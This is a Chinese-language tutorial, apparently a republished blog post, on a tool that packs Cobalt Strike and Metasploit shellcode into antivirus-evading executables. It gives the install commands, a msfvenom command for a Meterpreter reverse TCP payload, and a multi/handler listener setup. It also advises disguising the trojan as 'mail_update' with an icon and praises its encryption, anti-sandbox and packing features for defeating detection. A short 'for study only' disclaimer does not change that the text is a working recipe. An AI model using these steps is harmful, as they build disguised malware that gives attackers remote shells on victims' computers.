MSF CS通用免杀项目 （完美绕过主流杀毒软件）

本文我们来介绍一款在Cs和Msf中较好的免杀工具吧。

​

注意： 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为！造成法律后果与本文无关。

环境

Kali Linux

python3.8

安装

git clone https://github.com/shellfeel/Ant-AntV
cd Ant-AntV
pip install -r requirements.txt

生成shellcode

这里我们以cs为例。生成.bin格式的。

将生成的shellcode命名成beacon.bin 放到当前bean_raw路径下

如需给程序加上icon，可以将icon命名成mail_update.icon(可修改gen_trojan.py 48行形参out_file_name 来更改，这个参数本身也是生成的程序名)放入resource目录

执行下面命令进行打包程序。

python gen_trojan.py

打包完成后，效果如下

msf

生成shell

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin

利用上述同样的方式进行处理

配置msf

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit

免杀效果

(再此特别感谢群内小伙伴的测试！)

Cs成功上线

总结

使用随机密钥（混淆加密、shellcode加密），所以每次生成的程序都是全新的，避免被杀软散列标记导致全部失效。支持反沙箱逻辑、支持混淆、支持upx压缩。

版权属于：逍遥子大表哥

本文链接：https://cloud.tencent.com/developer/article/2207475

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。